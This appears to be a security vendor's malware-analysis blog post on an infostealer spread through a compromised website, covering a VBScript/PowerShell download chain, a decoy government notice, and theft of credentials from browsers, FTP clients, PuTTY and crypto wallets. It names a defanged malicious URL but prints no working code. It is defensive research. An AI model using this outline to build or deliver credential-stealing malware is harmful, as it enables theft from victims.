Zero trust security

Make it possible

Your Mission

Infostealer spreading through a compromised website

By: Tarun Dewan

Infostealer spreading through a compromised website

The Zscaler ThreatLabZ team has uncovered a new password stealer malware variant being delivered through a compromised website. The payload is Microsoft Intermediate Language (MSIL) compiled and steals the passwords from victims' system, browser, and FTP software.

The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe. 

Delivery vector

The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate. Activities performed by VBScript file are as follows:

  • Downloads decoy document
  • Terminate Microsoft Word process
  • Downloads payload through a PowerShell command
  • Removes the document recovery entries of Microsoft Word through registry entries

 

Figure 1: Screen capture of VBScript activity

Figure 2: Screen capture decoy document

The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions. 

Once the malware is executed, it performs various password stealing activities, such as checking for antivirus and looking into the directories and files from which it will steal information. The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware's C&C once it grabs the sensitive information (Figure 3):

Figure 3: Checking for installed antivirus products

Figure 4: Looking at directories and files for stealing passwords and collecting information

Figure 5: Checking for strings in the system with enumeration of various files and folders and upload to the C&C

The following screen captures show different extensions that the malware targets in the victim's machine for stealing credentials:

Figure 5: Strings of extensions

Figure 6: Strings of extensions

The screen captures below show snippets of password stealing of various browsers and software before uploading to the C&C server:

Figure 7: Chrome password stealer

Figure 8: Uploading to the C&C server


Figure 9: CuteFTP password stealer


Figure 10: Electrum Bitcoin password stealer

Figure 11: Firefox password stealer


The malware steals passwords from the following software and browsers:

  • Armory Wallet
  • Chrome
  • Firefox
  • CuteFTP
  • FileZilla
  • Putty
  • Electrum bitcoin wallet
  • WinSCP Passwords

 

Network communication:

Figure 12: Network information

 

Below is the snapshot of stolen data from the victim's machine by the malware author

Figure 13: Stolen data

Conclusion

This is yet another infostealer malware that attempts to steal stored credentials from a victim's machine. The malware also contains modules to steal sensitive files such as private keys, SSH keys, bitcoin wallets, etc. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.

The Zscaler Cloud Sandbox report highlighting the indicators is shown in screenshot below: 

Figure 14: Zscaler Cloud Sandbox malware report




Suggested Blogs